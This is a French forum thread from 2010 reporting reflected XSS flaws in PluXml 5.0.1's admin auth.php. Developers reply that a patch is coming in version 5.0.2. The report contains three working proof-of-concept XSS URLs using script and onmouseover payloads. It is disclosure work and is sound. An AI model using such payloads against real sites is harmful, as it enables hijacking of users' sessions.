Pluxml 5.0.1 - xss

smed79 · octobre 2010

bonjour,

j'ai trouvé ça:

XSS (auth.php)

/core/admin/auth.php?p=1>"><ScRiPt%20%0d%0a>alert(123)%3B</ScRiPt>

/core/admin/auth.php?p=/pluxml/core/admin/?>"'><ScRiPt>alert(123)</ScRiPt>

/core/admin/auth.php?p=%F6"+onmouseover=prompt(123)//

Message d'erreur

/core/lib/class.plx.feed.php
/core/lib/class.plx.admin.php

@++

Stéphane · octobre 2010

Bonjour smed79

Cette faille connue est corrigée, une mise à jour est sur le point d’être publiée très bientôt, le temps pour nous de valider complètement le patch.

Merci pour le signalement

smed79 · octobre 2010

bonjour Stéphane

si c'est pour très bientôt est-ce que c'est possible de prendre en compte mon message ici sinon, c' est pas grave...
@++

Stéphane · octobre 2010

Avec la sortie de la 5.0.2 ça devrait etre bon http://forum.pluxml.org/viewtopic.php?id=1993

smed79 · octobre 2010

Stéphane a écrit:

Avec la sortie de la 5.0.2 ça devrait etre bon http://forum.pluxml.org/viewtopic.php?id=1993

merci

Pluxml 5.0.1 - xss

Réponses